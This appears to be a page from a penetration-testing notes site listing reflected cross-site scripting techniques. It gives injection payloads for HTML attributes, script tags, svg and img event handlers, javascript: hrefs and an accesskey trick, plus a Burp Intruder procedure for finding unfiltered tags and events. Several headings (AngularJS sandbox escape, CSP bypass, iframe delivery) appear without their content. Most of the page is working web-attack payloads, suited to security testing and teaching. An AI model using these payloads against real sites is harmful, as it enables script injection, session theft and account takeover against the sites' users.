Reflected

Context

AccessKey Attribute

Set a global accessKey parameter. When the user presses the selected key, a script will be executed. Works only on Chrome

<url>/?%27accesskey=%27<key>%27onclick=%27alert(1)

HTML Parameter

"><script>...</script>
"><svg onload="...">
"><img src=. onerror="...">

//in case brackets are escaped, give onfocus event and focus on self
" autofocus onfocus="..." x="
" onmouseover="..." x="

Anchor href parameter poisoning

href="javascript:'...'"

HTML Tags

  1. Find vulnerable field

  2. Send request to Burp Intruder as following <§[payload]§> to find unfiltered tags

  3. Set the payload to a list of tags (see here) and start the attack

  4. After finding an unfiltered tag set the payload to <[tag]+§[payload]§="alert()">

  5. Set the payload to a list of events (see here) and start the attack

  6. After finding a suitable event the basic payload will be<[tag]+[event]="[js]">

Deliver through IFrame

Deliver with custom tag with autofocus

Javascript Block

Escape from string such as var x = 'input'

Escape from strings with angled brackets encoded

Evade filters

JS Template Literals

JS template strings are declared between backticks and use ${...} notation to evaluate code and inject the result in the string.

To execute code simply inject ${<...>} in the string

AngularJS Sandbox Escape

Sandbox escape by owerwriting the charAt method to join characters instead of evaluoating them one at a time

Code execution payloads

Content Security Policy Bypass

PreviousDOM BasedNextFilter Evasion

Last updated